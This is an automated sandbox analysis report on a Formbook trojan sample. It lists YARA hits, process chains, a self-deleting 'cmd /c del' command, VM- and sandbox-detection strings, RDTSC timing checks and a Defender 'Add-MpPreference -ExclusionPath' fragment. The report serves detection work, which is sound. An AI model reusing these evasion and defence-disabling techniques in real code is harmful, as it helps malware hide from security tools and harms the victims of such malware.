          Source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: g1EhgmCqCD.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@13/5
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\g1EhgmCqCD.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_01
          Source: g1EhgmCqCD.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: g1EhgmCqCD.exeVirustotal: Detection: 19%
          Source: g1EhgmCqCD.exeReversingLabs: Detection: 25%
          Source: unknownProcess created: C:\Users\user\Desktop\g1EhgmCqCD.exe 'C:\Users\user\Desktop\g1EhgmCqCD.exe'
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess created: C:\Users\user\Desktop\g1EhgmCqCD.exe C:\Users\user\Desktop\g1EhgmCqCD.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\g1EhgmCqCD.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess created: C:\Users\user\Desktop\g1EhgmCqCD.exe C:\Users\user\Desktop\g1EhgmCqCD.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\g1EhgmCqCD.exe'
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: g1EhgmCqCD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: g1EhgmCqCD.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msiexec.pdb source: g1EhgmCqCD.exe, 00000003.00000002.736006293.0000000003790000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.689209294.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: msiexec.pdbGCTL source: g1EhgmCqCD.exe, 00000003.00000002.736006293.0000000003790000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: g1EhgmCqCD.exe, 00000003.00000002.728612173.0000000001960000.00000040.00000001.sdmp, msiexec.exe, 00000009.00000002.910212121.0000000000E60000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: g1EhgmCqCD.exe, msiexec.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.689209294.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 1_2_04F7AE57 push 5D028C22h; ret
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 1_2_04F74E41 push eax; ret
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 1_2_04F7CF58 push eax; retf
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_00415AFB push eax; iretd
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_00414E3F push edx; retf
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_00415FF0 push es; iretd
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019DD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EDD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001E5AFB push eax; iretd
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001EB3A5 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001EB3FB push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001EB3F2 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001EB45C push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001E4E3F push edx; retf
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001E5FF0 push es; iretd
          Source: initial sampleStatic PE information: section name: .text entropy: 7.63788106715
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: g1EhgmCqCD.exe PID: 7100, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 00000000001D85E4 second address: 00000000001D85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 00000000001D896E second address: 00000000001D8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe TID: 7144Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe TID: 7104Thread sleep time: -104000s >= -30000s
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe TID: 7132Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6184Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5660Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeThread delayed: delay time: 104000
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000004.00000000.698332601.000000000FCE8000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.686782958.0000000004710000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.921706000.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.693765738.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000004.00000002.922317177.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.693765738.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000004.00000000.694412847.000000000A9CC000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%%
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000004.00000002.919520811.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000002.921706000.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.693874904.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000002.921706000.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000004.00000000.693874904.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: g1EhgmCqCD.exe, 00000001.00000002.667561253.0000000000CEF000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: explorer.exe, 00000004.00000002.921706000.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_00409B10 LdrLoadDll,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019BFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019BFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A069A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01982D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01982D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01982D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01982D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01982D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019AC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019BA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A38DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A06DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0198B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0198B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0198B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0199D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0199D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A58D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A0A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01989100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01989100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01989100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A4E539 mov eax, dword ptr fs:[00000030h]
